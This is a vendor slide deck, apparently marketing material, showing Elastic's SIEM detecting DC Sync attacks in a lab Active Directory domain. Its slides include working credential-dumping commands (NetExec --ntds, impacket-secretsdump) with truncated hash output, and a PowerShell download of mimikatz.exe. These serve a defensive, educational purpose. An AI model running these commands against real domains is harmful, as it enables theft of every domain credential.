DC Attack with Elastic
DC Sync Attack
CAUGHT BY ELASTIC AI SIEM
Presented by CarbonHelix
🔊 Voice narration active • Press Space or → to advance • Auto-advances after narration
What is a DC Sync Attack?
A DC Sync attack lets an attacker impersonate a Domain Controller to request password hashes from Active Directory — without ever running code on the DC itself.
Using the Directory Replication Service (DRSUAPI) protocol, the attacker simply asks for credential replication, mimicking normal DC-to-DC traffic. The result? Complete credential theft that looks like business as usual.
Using the Directory Replication Service (DRSUAPI) protocol, the attacker simply asks for credential replication, mimicking normal DC-to-DC traffic. The result? Complete credential theft that looks like business as usual.
Compromise Account
→
Get Replication Rights
→
Call DsGetNCChanges
→
Dump NTLM Hashes
Why Most EDRs Can't Stop This
DC Sync exploits legitimate AD functionality — not malware. Blocking the replication protocol would break your entire domain.
LIVING OFF THE LAND
No malicious files, no binaries — just standard RPC calls using tools like Mimikatz, Impacket, or CrackMapExec
AUTHORIZED TRAFFIC
The compromised account has legitimate replication rights — the requests appear fully authorized
BLOCKING = OUTAGES
Hard-blocking DRSUAPI would break DC replication, authentication, and backups across the enterprise
Attack #1: CrackMapExec (Remote DC Sync)
The scariest attack — uses SMB for remote replication. Completely bypasses endpoint-level EDR.
kali@attacker
$ nxc smb 10.190.32.10 -u 'kevin.mitnick' --ntds
[*] Windows Server 2019 Build 17763 (domain:hackproof.local)
[+] hackproof.local\kevin.mitnick (Pwn3d!)
[*] Dumping the NTDS, this could take a while...
Administrator:500:aad3b435b51404eeaad3...
hackproof.local\juan:e19ccf75ee54e06b06a5...
hackproof.local\chen:b4b9b02e6f09a9bd760f...
[*] All domain hashes dumped successfully
Medium
⚠ Potential Credential Access via DC Sync
Risk Score: 47
User: kevin.mitnick
Host: dc02
MITRE: T1003.006
Attack #2: Impacket SecretsDump (Remote)
Same goal, different tool. SecretsDump also dumps credentials from the SAM hive — and Elastic catches both techniques.
kali@attacker
$ impacket-secretsdump hackproof.local/kevin.mitnick@10.190.32.10
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[*] Dumping LSA Secrets
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404ee...
hackproof.local\kevin.mitnick:1103:aad3b435...
High
⚠ Potential Remote Credential Access via Registry
Risk Score: 73
User: kevin.mitnick
Host: dc02
MITRE: T1003.002 / T1021
Attack #3: Mimikatz — Blocked Instantly
Mimikatz couldn't even run. Elastic quarantined the binary immediately upon download — the file simply disappeared.
PowerShell - dc02
PS> wget http://10.190.32.12:9090/mimikatz.exe -OutFile mimikatz.exe
PS> ls
(empty — file quarantined by Elastic)
High
🛡 Malware Prevention Alert — QUARANTINED
Risk Score: 73
Rule: Windows.Hacktool.Mimikatz
File: mimikatz.exe
Action: quarantined
Elastic Caught Every Attack
CrackMapExec
Remote DC Sync via SMB/DRSUAPI
DETECTED
SecretsDump.py
Remote DC Sync + SAM Hive dump
DETECTED
Mimikatz
Local DC Sync attempt
BLOCKED
Even attacks that bypass traditional EDRs are caught by Elastic's AI-driven behavioral analysis.
Elastic Attack Discovery
Elastic doesn't just alert — it tells the full story of the attack using AI-powered Attack Discovery.
ATTACK CHAIN CORRELATION
Groups related alerts into coherent attack chains — showing the full sequence of events
MITRE ATT&CK MAPPING
Automatically maps activity to MITRE tactics and techniques for standardized classification
AI-POWERED TRIAGE
Prioritizes real threats, filters noise, and automates investigation — so your analysts focus on what matters
FULL NARRATIVE
Tells who, what, when, where — identifying users, hosts, and the complete attack timeline
MITRE ATT&CK — Attack Chain Mapped
Elastic mapped the full attack to the MITRE ATT&CK framework, highlighting Privilege Escalation, Credential Access, and Lateral Movement.
Reconnaissance
Resource Dev
Initial Access
Execution
Persistence
Priv Escalation
Defense Evasion
Credential Access
Discovery
Lateral Movement
Collection
Command & Control
Discovery
Credential Dump and Privilege Escalation
Host: dc02
Users: kevin.mitnick
Alerts: 2
Status: Open
Your SOC Has You Covered
3
Attack Tools Tested
3
Attacks Detected
0
Attacks Missed
CarbonHelix
+
Elastic AI SIEM
Protecting what matters. Even from the attacks that hide in plain sight.
Protecting what matters. Even from the attacks that hide in plain sight.
01 / 10
AUTO
